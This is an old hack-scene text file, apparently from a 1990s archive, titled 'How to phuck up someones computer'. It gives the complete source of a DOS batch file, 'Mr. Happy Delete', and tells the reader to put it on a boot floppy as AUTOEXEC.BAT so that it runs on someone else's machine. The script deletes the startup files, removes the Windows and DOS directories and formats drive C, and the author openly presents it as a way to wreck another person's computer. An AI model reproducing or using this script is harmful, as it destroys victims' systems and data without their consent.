home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / VORTEX.ZIP / 013.TXT < prev    next >
Text File  |  1995-10-28  |  3KB  |  77 lines

  1.                   How to phuck up someones computer
  2.  
  3.     It's called Mr. Happy Delete!  It's just a batch file that 
  4. can you to really mess someone's computer up.  All you have to do is 
  5. create an AUTOEXEC.BAT file for a 3 1/2 inch disk or a 5 1/4 inch disk
  6. (but if the computer you want to mess up has a 5 1/4 drive, the computer
  7. is probably really old and not worth the trouble.)  This particular batch
  8. file will delete all start-up files (IO.SYS, C:\AUTOEXEC.BAT, COMMAND.COM
  9. MSDOS.SYS), it'll delete C:\DOS if it exists, the Windows directory, and
  10. if Windows 95 is under the directory WIN95, then it'll also be deleted.
  11. As an added bonus, it can also reformat the hard drive.  I don't think I
  12. need to tell you not to try this file out on your computer, but since 
  13. there are morons out there I'll say it any way: DON'T TRY THIS ON YOUR
  14. COMPUTER!  And just in case someone's stupid to acidentally use the file,
  15. it's designed to ask you if you want to proceed to delete start-up files
  16. (and Windows and DOS), and it'll ask you twice if you want to format the
  17. hard drive.  Here's a sample file you might want to use: 
  18.  
  19. (NOTE:  Unless you know how the CHOICE, GOTO, and ERRORLEVEL commands
  20. work, I don't suggest you try to change them.  Although you can change
  21. the messages after the ECHO statements.)
  22.  
  23. @ECHO OFF
  24. CHOICE /C:YN Execute Mr. Happy Delete?
  25. If ErrorLevel 2 goto End2
  26. If ErrorLevel 1 goto HeHe
  27. :HeHe
  28. ECHO One moment please......
  29. @ATTRIB -S -H -R C:\*.*
  30. DEL C:\MSDOS.SYS
  31. DEL C:\IO.SYS
  32. DEL C:\CONFIG.SYS
  33. DEL C:\AUTOEXEC.BAT
  34. DEL C:\WINDOWS\*.INI
  35. DEL C:\WINDOWS\*.GRP
  36. if exist c:\windows\winfile.exe GOTO DEL1
  37. if exist c:\win95\winfile.exe GOTO DEL2
  38. if exist c:\dos\command.com GOTO DEL3
  39. :DEL1
  40. DELTREE C:\WINDOWS /Y
  41. GOTO END
  42. :DEL2
  43. DELTREE C:\WIN95 /Y
  44. GOTO END
  45. :DEL3
  46. DELTREE C:\DOS /Y
  47. GOTO END
  48. :END2
  49. ECHO Nothing deleted.
  50. goto end3
  51. :END
  52. CHOICE /YN Do you want to FORMAT drive c:\?
  53. IF ERRORLEVEL 2 GOTO NoFormat
  54. IF ERRORLEVEL 1 GOTO FormatDrive
  55. :NoFormat
  56. @ECHO (The computer's hard drive wasn't formatted.)
  57. Goto Cont1
  58. :FormatDrive
  59. @ECHO To format drive C, press Y when your asked if you
  60. @ECHO really want to format.
  61. FORMAT C:
  62. @ECHO Drive C has been formated (Unless you pressed N)
  63. :Cont1 
  64. @ECHO This computer is now officialy screwed.  Thanky you for using Mr. Happy
  65. ECHO delete!  Have a nice day!
  66. :end3
  67.  
  68. In order for this to work, you need to copy the files FORMAT.COM, 
  69. CHOICE.COM, DELTREE.EXE, ATTRIB.COM, and make sure you save the file 
  70. described above as AUTOEXEC.BAT saved on the disk that'll make someone
  71. very, very unhappy. (NOTE: Just in case anyone's stupid enough to save 
  72. it in drive C, make sure you save AUTOEXEC.BAT as A:\AUTOEXEC.BAT or 
  73. B:\AUTOEXEC.BAT)
  74.  
  75.                ----------- Vortex
  76.                        w/ credit to Haqr
  77.